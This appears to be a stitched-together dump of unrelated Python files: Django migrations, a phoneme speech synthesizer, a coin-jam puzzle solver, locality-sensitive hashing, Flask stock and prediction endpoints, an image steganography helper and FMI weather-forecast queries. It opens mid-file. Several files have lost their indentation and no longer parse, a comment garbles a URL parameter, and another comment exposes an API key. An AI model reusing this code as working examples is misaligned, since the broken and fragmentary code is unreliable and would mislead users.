            fileText = fileText + line.rstrip("\r\n")
            fileText = fileText + "\n"
            y = ''
            text = []
        else:
            # Sequence line: strip the newline and buffer it.
            y = ''.join(line.rstrip("\r\n"))
            text.append(y)
# Flush the final record's sequence.
fileText = fileText + ''.join(text)
print(fileText)
fh = open("test.txt", "w")
fh.write(fileText)
fh.close()
# Generated by Django 2.2.17 on 2021-03-10 19:38
from django.db import migrations, models
import django.db.models.deletion
def create_event_host_to_sponsor(apps, schema_editor):
    """Copy event.host to event.sponsor for existing events."""
    # Use the historical model via apps.get_model, per migration convention.
    Event = apps.get_model("workshops", "Event")
    # Bulk SQL update: sponsor mirrors host wherever a host is set.
    Event.objects.exclude(host__isnull=True).update(sponsor=models.F('host'))
class Migration(migrations.Migration):
    # Replaces the old M2M 'sponsors' with a single FK 'sponsor' (seeded from
    # 'host' for existing rows), tightens 'administrator'/'host' FKs, and
    # drops the now-unused Sponsorship model.

    dependencies = [
        ('workshops', '0234_auto_20210228_0940'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='event',
            name='sponsors',
        ),
        migrations.AddField(
            model_name='event',
            name='sponsor',
            field=models.ForeignKey(blank=False, help_text='Institution that is funding or organising the workshop.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sponsored_events', to='workshops.Organization'),
        ),
        # Data migration: copy host into the new sponsor FK (no-op on reverse).
        migrations.RunPython(create_event_host_to_sponsor, migrations.RunPython.noop),
        migrations.AlterField(
            model_name='event',
            name='administrator',
            field=models.ForeignKey(blank=False, help_text='Lesson Program administered for this workshop.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='administered_events', to='workshops.Organization'),
        ),
        migrations.AlterField(
            model_name='event',
            name='host',
            field=models.ForeignKey(help_text='Organisation hosting the event.', on_delete=django.db.models.deletion.PROTECT, related_name='hosted_events', to='workshops.Organization'),
        ),
        migrations.DeleteModel(
            name='Sponsorship',
        ),
    ]
|
import wave
import math
import struct
import subprocess
import thread
import sys
from Phonemes import Phonemes
from Syllables import Syllables
class SimpleSynthesizer(object):
SPACERS = {
" ": 0.2,
",": 0.4,
".": 0.6}
ACCENT_FACTOR = 2.0
PHONEMES_PATHS = ["synteza_mowy/p1/fonemy2016", "synteza_mowy/p1/fonemy_bodek", "synteza_mowy/p1/dzwieki1"]
@classmethod
def synthesize(cls, phonemes, phonemes_set):
phonemes_path = cls.PHONEMES_PATHS[phonemes_set%3]
output_path = "synteza_mowy/p1/output.wav"
cls._synthesize(phonemes, phonemes_path, output_path)
try:
thread.start_new_thread(cls.play, (output_path,))
except:
print "Error: unable to start thread"
@classmethod
def _synthesize(cls, phonemes, phonemes_path, output_path):
wave_output = wave.open(output_path, "w")
wave_output.setparams(cls.wave_getparams(phonemes_path))
phonemes_bytes = []
syllables_num = -1
accent_on = -1
i = 0
while i < len(phonemes):
p = phonemes[i]
if Phonemes.is_phoneme(p):
# set accent
if syllables_num < 0:
syllables_num = 0
accent_on = Syllables.count_syllables(phonemes, i)
if accent_on == 1:
accent_on -= 1
else:
accent_on -= 2
p_wav = wave.open(cls.phoneme_wav_path(p, phonemes_path), "r")
p_bytes = p_wav.readframes(p_wav.getnframes())
p_wav.close()
if syllables_num == accent_on:
phonemes_bytes.append(p_bytes)
else:
phonemes_bytes.append(cls.set_volume(p_bytes, 1.0/cls.ACCENT_FACTOR))
elif p == "|":
syllables_num += 1
else:
syllables_num = accent_on = -1
if cls.SPACERS.has_key(p):
phonemes_bytes.append(cls.gen_silence(cls.SPACERS[p], phonemes_path))
i+=1
wave_output.writeframes("".join(phonemes_bytes))
wave_output.close()
@classmethod
def phoneme_wav_path(cls, phoneme, phonemes_path):
return phonemes_path+"/"+phoneme+".wav"
@classmethod
def wave_getparams(phonemes_pathcls, phonemes_path):
s = wave.open(phonemes_path+"/a.wav", "rb")
params = s.getparams()
s.close
return params
@classmethod
def gen_silence(cls, seconds, phonemes_path):
(_, _, framerate, _, _, _) = cls.wave_getparams(phonemes_path)
values = []
for i in range(0, int(framerate*seconds)):
values.append(struct.pack("h", 0))
return "".join(values)
@classmethod
def set_volume(cls, values, factor):
new_values = []
for i in range(0, len(values)/2):
(v,) = struct.unpack("h", values[2*i:2*i+2])
new_values.append(struct.pack("h", int(v)*factor))
return "".join(new_values)
@classmethod
def play(cls, path):
if sys.platform == "darwin":
subprocess.call(["afplay", path])
elif sys.platform == "linux2":
subprocess.call(["aplay", path, "-q"])
|
#! /usr/bin/env python2.7
T=int(raw_input())
NJ=raw_input().split()
N=int(NJ[0])
J=int(NJ[1])
DivMax=212 # the max div to check
PrimeList=range(2,DivMax)
# for optimization, we build a list of primes less then DivMax
for i in range(4,DivMax):
if i %2==0 :
PrimeList.pop(PrimeList.index(i))
continue
j=3
while j<=i**0.5:
if i %j==0 :
PrimeList.pop(PrimeList.index(i))
break
j+=2
for test in range(1,T+1):
# Approach : we will brute force the problem, start from the minimum number statisfying conditions on coinjam, and test whether it is a coinjam
# or not, then move forward (by adding 2)
CJlist=[]
Nbr=2**(N-1)+1
while len(CJlist)<J:
#Nbr=eval("0b"+bin(i)[2:]+"1")
IsJamCoin=True
DivList=[]
bits=[int(bit) for bit in list(bin(Nbr)[2:])]
for base in range(2,11):
# Calculat sting interpretation in base "base"
M=0
for j in range(len(bits)):
M=M+bits[j]*base**j
# Check primality, we will only check against primes in PrimeList, that's to say divisor less or equal to DivMax
IsPrime=True
RM=M**0.5
j=0
while j< len(PrimeList) & PrimeList[j] <=RM:
prime =PrimeList[j]
if M % prime==0:
IsPrime=False
DivList.append(prime)
break
j+=1
if IsPrime:
IsJamCoin=False
break
if IsJamCoin :
CJlist.append([Nbr, DivList])
Nbr+=2
# We suppose that hopefully we have got J jamCoins of length N with divisors of their repesentations in base 2 to 10
# we print the result
print "Case #{}:".format(test)
for line in CJlist:
Nbr=line[0]
bits=[str(bit) for bit in list(bin(Nbr)[2:])]
bits.reverse()
DivList=[str(prime) for prime in line[1]]
print "".join(bits)+" "+ " ".join(DivList)
#checking
for line in CJlist:
Nbr=line[0]
DivList=line[1]
bits=[int(bit) for bit in list(bin(Nbr)[2:])]
for base in range(2,11):
M=0
for j in range(len(bits)):
M=M+bits[j]*base**j
if M % DivList[base-2] >0:
print "you missed nbr=" , bin(Nbr)[2:] , "base= ", base
|
import os
import os.path
import sys
from sys import platform
sys.path.append(os.path.join(os.getcwd(), "Measures"))
import numpy as np
import pandas as pd
from collections import defaultdict
from sklearn.utils import check_random_state
from sklearn.utils.validation import check_array
import timeit
import random
from .SimpleHashing import SimpleHashing
from collections import defaultdict
import statistics
from collections import Counter
class LSH(SimpleHashing):
    """Locality-sensitive hashing over categorical data: selects hbits
    attributes (lowest normalized cut values) as hash bits and buckets
    the n items by their resulting hash codes."""

    def DoHash(self):
        """Build the similarity-driven hash table. Always returns -1."""
        self.measure.GeneratesimMatrix()
        self.GenerateSimilarityMatrix(self.measure.simMatrix)
        # Pick the hbits attributes with the smallest normalized cut values.
        self.bit_indexes = np.argpartition(self.cut_values_normal, self.hbits)[:self.hbits]
        self.GenerateHashTable()
        return -1

    def GenerateHashTable(self):
        """Hash every sample and group sample indices by hash value."""
        print("Generating LSH hash table: ", " hbits:", str(self.hbits) +'('+ str(2**self.hbits)+')', " k", self.k , " d", self.d , " n=",self.n )
        self.hash_values = [self.ComputeHashValue(x) for x in self.X]
        self.hashTable = defaultdict(list)
        for i in range(self.n):
            self.hashTable[self.hash_values[i]].append(i)

    def GetNeighborsbyBucket(self, item_id):
        """Return the sample indices sharing item_id's bucket (itself included)."""
        return self.hashTable[self.hash_values[item_id]]

    def ComputeHashValue(self,x):
        """Compute the hbits-bit hash of sample x: one bit per selected
        attribute, set when the value falls in the attribute's second
        partition."""
        val=0
        for i in range(self.hbits):
            partitions = self.partitions[self.bit_indexes[i]]
            val <<=1
            if x[self.bit_indexes[i]] in partitions[1]:
                val+=1
        return val

    # Kept for reference: threshold-based variant of ComputeHashValue.
    #def ComputeHashValue(self,x):
    #    val=0
    #    for i in range(self.hbits):
    #        #partitions = self.partitions[self.bit_indexes[i]]
    #        val <<=1
    #        #if x[self.bit_indexes[i]] in partitions[1]:
    #        if x[self.bit_indexes[i]] >= self.D[self.bit_indexes[i]]/2:
    #            val+=1
    #    return val

    #def TryToMovePoint(self,hashValue_ori, hashValue_cur, index ):
    #for i in range(index,self.hbits):

    def hammingDistance(self, x, y):
        """Return the number of differing bits between x and y (32-bit scan)."""
        ans = 0
        for i in range(31,-1,-1):
            b1= x>>i&1
            b2 = y>>i&1
            ans+= not(b1==b2)
        return ans

    def CorrectSingletonBucket(self):
        """Merge empty/singleton buckets into the bucket with the closest
        (Hamming-distance) hash value."""
        list_hash_1 = []
        for hashValue,itemList in self.hashTable.items():
            if(len(itemList)<=1):
                list_hash_1.append((hashValue, itemList))
        # Remove the singleton buckets before searching for merge targets.
        for iters in list_hash_1:
            del self.hashTable[iters[0]]
        for iters in list_hash_1:
            closest_hash_value = -1
            closest_dist=1000000
            for hashValue,itemList in self.hashTable.items():
                temp = self.hammingDistance(iters[0],hashValue)
                if temp < closest_dist:
                    closest_hash_value = hashValue
                    closest_dist = temp
            # Re-home the orphaned items into the closest surviving bucket.
            for i in iters[1]:
                self.hash_values[i] = closest_hash_value
                self.hashTable[closest_hash_value].append(i)
        print("LSH Merged ",len(list_hash_1),"/", len(self.hashTable) , " buckets!!!" )

    def TestHashTable(self):
        """Print bucket statistics and return the fraction of samples whose
        label matches their bucket's dominant label (purity in [0, 1])."""
        n = len(self.hashTable.items())
        num_0 = 2**self.hbits - len(self.hashTable.items());
        num_1 = 0;
        len_list=[]
        for hashValue,itemList in self.hashTable.items():
            if(len(itemList)==1): num_1+=1
            len_list.append(len(itemList))
        mean=np.mean(len_list)
        std_ = np.std(len_list)
        print( "Num bucket:",n," Num zero:", num_0, " Num 1:", num_1, " Mean:", mean, " Std:",std_)
        #Test within buckets
        sum_=0
        for hashValue,itemList in self.hashTable.items():
            labels = self.y[itemList]
            test_list = Counter(labels)
            domiant_label = test_list.most_common(1)[0][0]
            sum_+= sum(labels==domiant_label)
        return sum_/self.n
def main():
    """Demo driver: build an LSH table over synthetic data and score it."""
    # NOTE(review): MeasureManager and tulti are not imported in this module;
    # running main() as-is would raise NameError - confirm intended imports.
    MeasureManager.CURRENT_MEASURE = 'DILCA'
    DB = tulti.LoadSynthesisData(n=2048,d=10,k=20,sigma_rate=0.1);
    MeasureManager.CURRENT_DATASET = DB['name']
    hashing = LSH(DB['DB'],DB['labels_'],measure='DILCA')
    hashing.test()
    hashing.DoHash()
    score = hashing.TestHashTable()
    print('Score: ', score)
    # Merge singleton buckets and re-score to see the improvement.
    hashing.CorrectSingletonBucket();
    score = hashing.TestHashTable()
    print('Score: ', score)
    asd = 123  # NOTE(review): unused leftover debug variable
if __name__ == "__main__":
    main()
import requests
import urllib.parse
from flask import redirect, render_template, request, session
from functools import wraps
def lookup(symbol):
    """
    Look up a stock quote for *symbol* via the IEX trading API.

    Returns a dict with "name", "price" (float) and "symbol", or None
    when the request fails or the payload cannot be parsed.
    """
    url = f"https://api.iextrading.com/1.0/stock/{urllib.parse.quote_plus(symbol)}/quote"
    # Contact API
    try:
        response = requests.get(url)
        response.raise_for_status()
    except requests.RequestException:
        return None
    # Parse response
    try:
        quote = response.json()
        return {
            "name": quote["companyName"],
            "price": float(quote["latestPrice"]),
            "symbol": quote["symbol"],
        }
    except (KeyError, TypeError, ValueError):
        return None
def usd(value):
    """Format *value* as US dollars, e.g. 1234.5 -> "$1,234.50"."""
    return "${:,.2f}".format(float(value))
def full_lookup(symbol):
    """
    Look up a stock quote for *symbol*.

    Fix: this was a byte-for-byte copy of lookup(); it now delegates so the
    two entry points cannot drift apart. Kept as a separate name because
    callers may expect an extended quote here in the future.
    """
    return lookup(symbol)
|
import Hierarchical_clustering
import Second_Hierarchical_clustering
import Get_feature

# Parameter-sweep driver: for each dataset index, run the first clustering
# pass at threshold t1, the second pass at threshold t2, then extract features.
for data_number in range(4,5):
    for t1 in range(9,10):
        t1=t1*0.5  # first-pass threshold (here effectively 4.5)
        Hierarchical_clustering.frist_Hierarchical(t1,data_number)
        for t2 in range(6,7):
            t2=t2*0.5  # second-pass threshold (here effectively 3.0)
            Second_Hierarchical_clustering.Second_Hierarchical(t2)
            Get_feature.Get_feature(t1,t2,data_number)
|
import pickle

# Define some variables that will be put into pickle
Album = ( "Rammstain",
          "Mutter",
          1991,
          ( (1, "Mutter"),
            (2, "Moskau"),
            (3, "Herzlich")))
var_num = 14356
var_str = "Test string to pickle"

# Serialize: successive dump() calls append objects to the same file.
with open("vars.pickle", "wb") as vars_pickled:
    pickle.dump(Album, vars_pickled)
    pickle.dump(var_num, vars_pickled)
    pickle.dump(var_str, vars_pickled)

# Deserialize: load() calls read objects back in the same order as dumped.
with open("vars.pickle", "rb") as vars_pickled:
    Album_loaded = pickle.load(vars_pickled)
    var_num_loaded = pickle.load(vars_pickled)
    var_str_loaded = pickle.load(vars_pickled)

# Unpack the loaded album tuple and display its contents.
artist, album_title, year, tracks = Album_loaded
print(artist)
print(album_title)
print(year)
for track in tracks:
    track_num, title = track
    print("Track {0} has title {1}".format(track_num, title))
import scipy.optimize as op


def f(x):
    """Badly scaled quadratic with roots near 1e-8 and 1e8."""
    return x ** 2 - 1e8 * x + 1


# The tiny root (close to 0), found from a starting guess of 0.
x1 = op.fsolve(f, x0=0)
# The large root (close to 1e8), found from a starting guess of 1e9.
x2 = op.fsolve(f, x0=1e9)
# FileName : pyTime_practice.py
# Author : Adil
# DateTime : 2018/7/27 16:17
# SoftWare : PyCharm

import time

# Python date/time formatting directives:
# %y two-digit year (00-99)
# %Y four-digit year (0000-9999)
# %m month (01-12)
# %d day of month (0-31)
# %H hour, 24-hour clock (0-23)
# %I hour, 12-hour clock (01-12)
# %M minute (00-59)
# %S second (00-59)
#
# %a abbreviated weekday name (locale)
# %A full weekday name (locale)
# %b abbreviated month name (locale)
# %B full month name (locale)
# %c locale-appropriate date and time representation
# %j day of year (001-366)
# %p locale equivalent of A.M./P.M.
# %U week number of the year (00-53), Sunday as first day of the week
# %w weekday (0-6), Sunday is 0
# %W week number of the year (00-53), Monday as first day of the week
# %x locale-appropriate date representation
# %X locale-appropriate time representation
# %Z current timezone name
# %% a literal % character

# Current Unix timestamp (seconds since the epoch, as float).
time1 = time.time()
print(time1)
# Local time as a struct_time.
localTime = time.localtime(time.time())
# Format the local time as a string.
localTimeStrs = time.strftime("%Y-%m-%d %H:%M:%S",localTime)
print(localTime)
print(localTimeStrs)

# Date arithmetic with datetime.
import datetime
day1 = datetime.datetime(2018,6,2)
day2 = datetime.datetime(2018,4,16)
# Number of days between the two fixed dates.
print((day1-day2).days)
# Current date and time.
nowTime = datetime.datetime.now()
print("nowTime: ",nowTime)
# Individual components of the current time:
# year
print(nowTime.year)
print(nowTime.day)
print(nowTime.month)
print(nowTime.hour)
print(nowTime.minute)
print(nowTime.second)
# Subtract 30 days from day1 to get the start of the ~30-day window.
beforeTime = day1 - datetime.timedelta(days=30)
# Use + to go forward; hours, minutes and seconds units also work.
print("beforeTime: ",beforeTime)
# Sample output:
# 1526451775.666749
# time.struct_time(tm_year=2018, tm_mon=5, tm_mday=16, tm_hour=14, tm_min=22, tm_sec=55, tm_wday=2, tm_yday=136, tm_isdst=0)
# 2018-05-16 14:22:55
# 30
# nowTime: 2018-05-16 14:22:55.670309
# beforeTime: 2018-04-17 14:22:55.670309

import calendar
cal = calendar.month(2018,2)
print(cal)

# Fixed "current" date for the weekly examples below.
curTime = datetime.date(2018,7,9)
print("设置当前时间")
print(curTime)
# One week before the current date:
beforeone = curTime - datetime.timedelta(7)
print("前一周:")
print(beforeone)
beforetwo = beforeone - datetime.timedelta(7)
print("前两周:")
print(beforetwo)
beforethr = beforetwo - datetime.timedelta(7)
print("前三周:")
print(beforethr)
beforefour = beforethr - datetime.timedelta(7)
print("前四周:")
print(beforefour)
beforefive = beforefour - datetime.timedelta(7)
print("前五周:")
print(beforefive)
# beforetwo = curTime - datetime.timedelta(6)
# print("前一周:")
# print(beforeone)

# Difference in days between two dates.
curTime1 = datetime.date(2018,5,15)
oldTime = datetime.date(2018,5,14)
print("时间差:")
print((curTime1-oldTime).days)
|
# Transform string str01 into str02, recording each intermediate string of
# the transformation in a list; every intermediate string must be a key of
# my_dict (classic word-ladder problem, implementation not written yet).
my_dict = {"hot": 1, "dot": 1, "dog": 1, "lot": 1, "log": 1, "cog": 1}
# def change_str(str01,str02):
|
from rest_framework.response import Response
from rest_framework import generics
from rest_framework import mixins
from blog.serializer import PostSerializer, CommentSerializer
from blog.models import Post, Comment
class GenericPostView(generics.GenericAPIView, mixins.ListModelMixin, mixins.CreateModelMixin,
                      mixins.UpdateModelMixin, mixins.RetrieveModelMixin,
                      mixins.DestroyModelMixin):
    """Generic CRUD view for Post objects, dispatching to the DRF mixins.

    Fix: the destroy mixin is named ``DestroyModelMixin`` (singular); the
    original ``mixins.DestroyModelMixins`` raises AttributeError on import.
    """
    serializer_class = PostSerializer
    queryset = Post.objects.all()
    lookup_field = 'id'

    def get(self, request, id = None):
        # Retrieve a single post when an id is supplied, otherwise list all.
        if id:
            return self.retrieve(request)
        else:
            return self.list(request)

    def post(self, request):
        # Create a new post from the request body.
        return self.create(request)

    def put(self, request, id=None):
        # Update the post identified by ``lookup_field`` in the URL kwargs.
        return self.update(request, id)

    def delete(self, request, id):
        # Delete the post identified by the URL kwargs.
        return self.destroy(request, id)
class GenericCommentView(generics.GenericAPIView, mixins.ListModelMixin, mixins.CreateModelMixin,
                         mixins.UpdateModelMixin, mixins.RetrieveModelMixin,
                         mixins.DestroyModelMixin):
    """Generic CRUD view for Comment objects, dispatching to the DRF mixins.

    Fix: ``DestroyModelMixins`` → ``DestroyModelMixin`` (the plural name
    does not exist and raises AttributeError on import).
    """
    serializer_class = CommentSerializer
    queryset = Comment.objects.all()
    lookup_field = 'id'

    def get(self, request, id = None):
        # Retrieve a single comment when an id is supplied, otherwise list all.
        if id:
            return self.retrieve(request)
        else:
            return self.list(request)

    def post(self, request):
        # Create a new comment from the request body.
        return self.create(request)

    def put(self, request, id=None):
        # Update the comment identified by ``lookup_field`` in the URL kwargs.
        return self.update(request, id)

    def delete(self, request, id):
        # Delete the comment identified by the URL kwargs.
        return self.destroy(request, id)
|
from PIL import Image
import numpy as np
from base_pic import BasePic
from base_file import BaseFile
class Stegan:
    """Steganography helper: hides a file's bits in the low nibble of a picture.

    ``pic`` must expose ``bin_array`` (rows -> pixels -> 8-bit binary strings,
    one per colour channel) plus ``file_name``/``file_extension``; ``file``
    must expose ``binary_array`` (a flat sequence of 4-bit strings).
    """

    def __init__(self, pic, file):
        self.pic = pic
        self.file = file
        self.pic_array = self.pic.bin_array
        self.file_array = self.file.binary_array
        self.pic_msb_array = None
        self.pic_lsb_array = None
        self.combined_arrays = None

    def split_MSB_LSB_in_pic(self):
        """Splits the binary elements in an array into MSB and LSB. Returns two arrays"""
        msb = []
        lsb = []
        for x in self.pic_array:
            col_msb = []
            col_lsb = []
            for y in x:
                rgb_msb = []
                rgb_lsb = []
                for color in y:
                    # High nibble (first 4 bits) / low nibble (last 4 bits).
                    rgb_msb.append(color[:4])
                    rgb_lsb.append(color[4:])
                col_msb.append(rgb_msb)
                col_lsb.append(rgb_lsb)
            msb.append(col_msb)
            lsb.append(col_lsb)
        return [msb, lsb]

    def combine_arrays(self):
        """Takes the MSBs from the pic and systematically adds each 4-bit from the file array in place of the LSB"""
        countdown = 0
        eba = []
        # (The original wrapped this in ``while True: ... break``, which ran
        # exactly once; the loop was removed with no behaviour change.)
        for x in self.pic_msb_array:
            col = []
            for y in x:
                rgb = []
                for color in y:
                    try:
                        rgb.append(self.convert_binary(color + self.file_array[countdown]))
                        countdown += 1
                    except IndexError:
                        # File bits exhausted: pad remaining pixels with zeros.
                        # (Was a bare ``except`` that also hid unrelated errors.)
                        rgb.append(self.convert_binary(self.fill_to_8bit(color)))
                col.append(rgb)
            eba.append(col)
        return eba

    def fill_to_8bit(self, var):
        """Fills a variable that is less than 8 bits up to length 8 with 0's to the right"""
        return var.ljust(8, '0')

    def convert_binary(self, bin):
        # ``bin`` shadows the builtin; name kept for interface compatibility.
        return int(bin, 2)

    def convert_back_to_image(self):
        """Converts the processed array back to an image"""
        # Image.fromarray with mode='RGB' expects uint8 pixels; the default
        # int64 array produced from Python ints would be misinterpreted.
        np_array = np.array(self.combined_arrays, dtype=np.uint8)
        data = Image.fromarray(np_array, mode='RGB')
        data.save('{}_steganographized.{}'.format(self.pic.file_name, self.pic.file_extension))

    def auto_run(self):
        """Split the picture, embed the file bits, and write the output image."""
        two_arrays = self.split_MSB_LSB_in_pic()
        self.pic_lsb_array = two_arrays[1]
        self.pic_msb_array = two_arrays[0]
        self.combined_arrays = self.combine_arrays()
        self.convert_back_to_image()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add address/email/phone many-to-many links to the resume model.

    NOTE(review): ``null=True`` has no effect on ManyToManyField (Django
    ignores it and emits a warning); ``blank=True`` alone controls whether
    the relation may be empty in forms.
    """

    dependencies = [
        ('profile_management', '0002_auto_20160122_0639'),
        ('resume_management', '0002_auto_20160122_0632'),
    ]

    operations = [
        migrations.AddField(
            model_name='resume',
            name='addresses',
            field=models.ManyToManyField(to='profile_management.Address', null=True, blank=True),
        ),
        migrations.AddField(
            model_name='resume',
            name='emails',
            field=models.ManyToManyField(to='profile_management.Email', null=True, blank=True),
        ),
        migrations.AddField(
            model_name='resume',
            name='phone_numbers',
            field=models.ManyToManyField(to='profile_management.PhoneNumber', null=True, blank=True),
        ),
    ]
|
import urllib.request
import xmltodict, json
#import pygrib
import numpy as np
import pandas as pd
from datetime import datetime
import time
# Query to extract parameter forecasts for one particular place (point)
#
# http://data.fmi.fi/fmi-apikey/f96cb70b-64d1-4bbc-9044-283f62a8c734/wfs?
# request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::multipointcoverage
# &place=valencia
# ¶meters="GeopHeight, Temperature, Pressure, Humidity, WindDirection, WindSpeedMS,
# WindUMS, WindVMS, MaximumWind, DewPoint, Precipitation1h, PrecipitationAmount"
#
def extract_forecasts_place(fmi_addr, my_api_key, data_format, parameters, place ):
    """Query the FMI WFS stored query for point forecasts at ``place``.

    Parameters:
        fmi_addr, my_api_key: base URL and API key fragments of the FMI service.
        data_format: stored-query suffix (e.g. ``"multipointcoverage"``).
        parameters: iterable of forecast parameter names.
        place: location name (e.g. ``"valencia"``).

    Returns:
        The XML response parsed into a dict by ``xmltodict``.
    """
    request = "getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::" + data_format
    # Join parameter names into the comma-separated list the API expects.
    # (Also avoids the IndexError the manual loop hit on an empty list.)
    query_parameters = ",".join(parameters)
    query = fmi_addr + my_api_key + "/wfs" + "?" + "request" + "=" + request + "&" + "place=" + place + "&" + "parameters=" + query_parameters
    print(query, "\n")
    with urllib.request.urlopen(query) as fd:
        response = xmltodict.parse(fd.read())
    return(response)
#---------------------------------------------------------------------------------------
# Query to extract parameter forecasts for a Region Of Interest (grid defined by bbox)
#
# Query made for FMI:
# http://data.fmi.fi/fmi-apikey/f96cb70b-64d1-4bbc-9044-283f62a8c734/wfs?
# request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::grid
# & crs=EPSG::4326
# & bbox=-0.439453, 39.192884, -0.201874, 39.426647
# & parameters=Temperature,Humidity,WindDirection, WindSpeedMS
#
def extract_forecasts_grid(fmi_addr, my_api_key, query_request, data_format, coord_sys, bbox, parameters):
    """Query the FMI WFS service for forecasts over a bounding-box grid.

    Parameters:
        fmi_addr, my_api_key: base URL and API key fragments of the FMI service.
        query_request: stored-query prefix; ``data_format`` (e.g. ``"grid"``)
            is appended to it.
        coord_sys: coordinate system, e.g. ``"EPSG::4326"``.
        bbox: sequence of 4 numbers [min_lon, min_lat, max_lon, max_lat].
        parameters: iterable of forecast parameter names.

    Returns:
        The XML response parsed into a dict by ``xmltodict``.
    """
    request = query_request + data_format
    # coordinate system e.g. coord_sys = EPSG::4326
    query_crs = coord_sys
    # bbox = [-0.439453, 39.192884, -0.201874, 39.426647] --- region of Valencia
    query_box = ",".join(str(coord) for coord in bbox)
    query_parameters = ",".join(parameters)
    query = fmi_addr + my_api_key + "/wfs" + "?" + "request" + "=" + request + "&" + \
            "crs=" + query_crs + "&" + "bbox=" + query_box + "&" + "parameters=" + query_parameters
    print("Query made for FMI: \n{}\n".format(query))
    with urllib.request.urlopen(query) as fd:
        response = xmltodict.parse(fd.read())
    return(response)
#-----------------------------------------------------------------------------
# Query to extract values from a grib file in data.frame (dset)
# Columns names of data.frame are:
# ['Measurement_Number', 'Name', 'DateTime', 'Lat', 'Long', 'Value']
#
def extract_gribs(dataDICT):
    """Download the grib2 file referenced by an FMI WFS response and unpack
    it into a DataFrame with columns
    ['Measurement_Number', 'Name', 'DateTime', 'Lat', 'Long', 'Value'].

    NOTE(review): ``pygrib`` is only imported in a commented-out line at the
    top of this module, so ``pygrib.open`` below raises NameError as-is;
    re-enable that import before calling this function.
    """
    # gml:fileReference to key for the FTP
    # path for the value we need , for downloading grib2 file
    FTPurl = dataDICT['wfs:FeatureCollection']['wfs:member'][1]['omso:GridSeriesObservation']['om:result']['gmlcov:RectifiedGridCoverage']['gml:rangeSet']['gml:File']['gml:fileReference']
    print("Query for downloading grb file with the values asked: \n{}\n".format(FTPurl))
    # Create the grib2 file
    result = urllib.request.urlopen(FTPurl)
    with open('gribtest.grib2', 'b+w') as f:
        f.write(result.read())
    gribfile = 'gribtest.grib2'  # Grib filename
    grb = pygrib.open(gribfile)
    # Creation of dictionary, for parameters : metric system
    paremeters_units = {
        "Mean sea level pressure": "Pa", "Orography": "meters", "2 metre temperature": "°C",
        "2 metre relative humidity": "%",
        "Mean wind direction": "degrees",
        "10 metre wind speed": "m s**-1",
        "10 metre U wind component": "m s**-1",
        "10 metre V wind component": "m s**-1",
        "Maximum wind velocity": "m s**-1",
        "surface precipitation amount, rain, convective": "kg m**-2", "2 metre dewpoint temperature": "°C"}
    # Create a data frame to keep all the measurements from the grib file
    dset = pd.DataFrame(columns=['Measurement_Number', 'Name', 'DateTime', 'Lat', 'Long', 'Value'])
    for g in grb:
        str_g = str(g)  # casting to str
        col1, col2, *_ = str_g.split(":")  # split the message columns
        # Temporary data.frame holding one grib message, flattened per point
        temp_ds = pd.DataFrame(columns=['Measurement_Number', 'Name', 'DateTime', 'Lat', 'Long', 'Value'])
        meas_name = col2
        meas_no = col1
        g_values = g.values
        lats, lons = g.latlons()
        g_shape = g.values.shape
        # One row per grid point in the message
        dim = g_shape[0] * g_shape[1]
        temp_ds['Measurement_Number'] = [meas_no] * dim
        temp_ds['Name'] = [meas_name] * dim
        temp_ds['DateTime'] = [ g.validDate.isoformat() + 'Z' ] * dim
        temp_ds['Lat'] = lats.flatten()
        temp_ds['Long'] = lons.flatten()
        temp_ds['Value'] = g_values.flatten()
        dset = pd.concat([dset, temp_ds], ignore_index=True)
    # close grib file
    # NOTE(review): ``f`` was already closed by the ``with`` block above, so
    # this is a redundant no-op; the handle actually left open is ``grb``.
    f.close()
    return(dset)
|
# Spell out the name letter by letter (the task requires prompting the user
# for the name; the original assigned "" so the loop never printed anything).
nombre = input("Ingresa tu nombre: ")
for x in nombre:
    print(x)
# -*- coding: utf-8 -*-
"""
REST API serving a simple Titanic survival predictor
"""
import pandas as pd
from flask import request
from flask_restful import Resource
from app import app, api
from model import PassengerSchema
from predictor import serialized_prediction
__author__ = "Felipe Aguirre Martinez"
__email__ = "felipeam86@gmail.com"
# Shared schema instance used to (de)serialise lists of passengers.
passenger_schema = PassengerSchema(many=True, strict=True)
@api.route('/prediction')
class Prediction(Resource):
    """POST endpoint: predict survival for a JSON list of passengers."""

    def post(self):
        # Deserialise the posted passengers, assemble them into one frame,
        # and hand the frame to the predictor.
        payload = request.get_json()
        loaded = passenger_schema.load(payload)
        frame = pd.concat(loaded.data)
        return serialized_prediction(frame)
# Development entry point: listen on all interfaces with 4 worker processes.
if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', processes=4)
import io
from flask import Blueprint, jsonify
from flask import request
from common import util
from common.api import require_root
from common.api import require_user
from mediation import MediationConfig
from mediation import data_query
from mediation.data_receiver import DataInsertor
# Blueprint grouping all mediation data endpoints (mounted by the app factory).
dataAPI = Blueprint('data_api', __name__)
@dataAPI.route('/query', methods=["POST"])
@require_user
def dataQueryV2():
    """
    Endpoint for getting traffic data.
    POST body:
    {
    "from":"01.02.2017",
    "to":"15.02.2017",
    "country":"CZ",
    "lobName":"ACI",
    "flowName":["GSM"],
    "forwards":[],
    "granularity":0
    }
    Response:
    {
    "data": [
        {
        "GSM": 188385532,
        "_id": "2017-02-01T00:00:00+01:00",
        "dayAverage": 1162595297.6666667,
        "dayDifference": 1.023,
        "expected": 161627916,
        "status": "OK",
        "tickDifference": 1.166
        },
        ...
    ],
    "metadata": {
        "flowName": "GSM",
        "granularity": 480,
        "metrics": {
        "GSM": {
            "type": "traffic"
        },
        "dayAverage": {
            "type": "traffic"
        },
        "dayDifference": {
            "type": "difference"
        },
        "expected": {
            "type": "traffic"
        },
        "status": {
            "type": "other"
        },
        "tickDifference": {
            "type": "difference"
        }
        }
    }
    """
    # Parse the request body into query bounds and flow selection.
    searchParam = request.get_json()
    fromDate = util.stringToDate(searchParam["from"])
    toDate = util.stringToDate(searchParam["to"])
    country = searchParam["country"]
    lobName = searchParam["lobName"]
    lobConfig = MediationConfig.getLobWithCountry(country, lobName)
    flows = []
    # Granularity 0 lets the query layer choose a default bucket size.
    granularity = searchParam.get("granularity", 0)
